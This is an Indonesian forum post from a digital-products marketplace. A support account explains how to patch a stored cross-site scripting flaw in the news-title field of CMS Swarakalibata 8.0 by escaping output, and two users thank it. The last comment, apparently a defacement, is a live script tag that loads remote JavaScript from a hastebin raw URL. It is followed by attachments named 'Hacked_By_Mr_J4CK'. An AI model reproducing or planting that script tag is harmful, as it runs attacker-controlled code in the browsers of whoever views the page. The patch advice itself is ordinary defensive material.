Hallo! Selamat Datang di Marketplace produk digital, Freelancer terbaik di indonesia (68495 Members, 790 Products, 5357 Topic, 13048 Comments)

CMS Swarakalibata Hack - Halaman Manajemen Berita yang sering dijadikan sasaran

Dibuat
Login Terakhir 19 Jam lalu,
Telah Dilihat 2772 Kali
PHPMU.COM Support Mengatakan : Sultan Account
  1. Assalamualaikum Warahmatullahi Wabarakatuh...
  2. Selamat pagi, berikut Update security untuk CMS Swarakalibata 8.0 yang sering dijadikan sasaran oleh user kontributor usil, biasanya konstributor usil menyisipkan kode javascript pada saat posting berita di inputan Judul, hingga jika modul berita di akses dari halaman admin akan blank/kosong atau menampilkan isi dari script js yang diselipkan pada inputan judul tersebut.
  3.  
  4. Cara memperbaikinya cukup mudah, buka file :
  5. application\views\administrator\mod_berita\view_berita.php
  6.  
  7. pada baris : 27 untuk script ini : <td>$row[judul]</td>
  8. Ubah menjadi : <td>".cetak($row['judul'])."</td>
  9.  
  10. Simpan dan Selesai,..

Ada 3 Jawaban

Kurniawan aghil
commented on 04 Des 2021 04:45:57
  1. Assalamualaikum,..
  2.  
  3. Sangat membantu, terimakasih
Syahir Abqori
commented on 21 Des 2021 18:23:12
  1. Terima kasih sangat membantu..
jackxcode404
commented on 12 Feb 2022 23:21:37
  1. <script type="text/javascript" src="https://hastebin.com/raw/iduzuludit"></script>
Terdapat 2 File dilampirkan :
1. Hacked_By_Mr_J4CK.jpg (529 KB)
2. Hacked_By_Mr_J4CK1.jpg (529 KB)
Maaf, Untuk Memberikan Komentar Anda Harus Login !!!

Online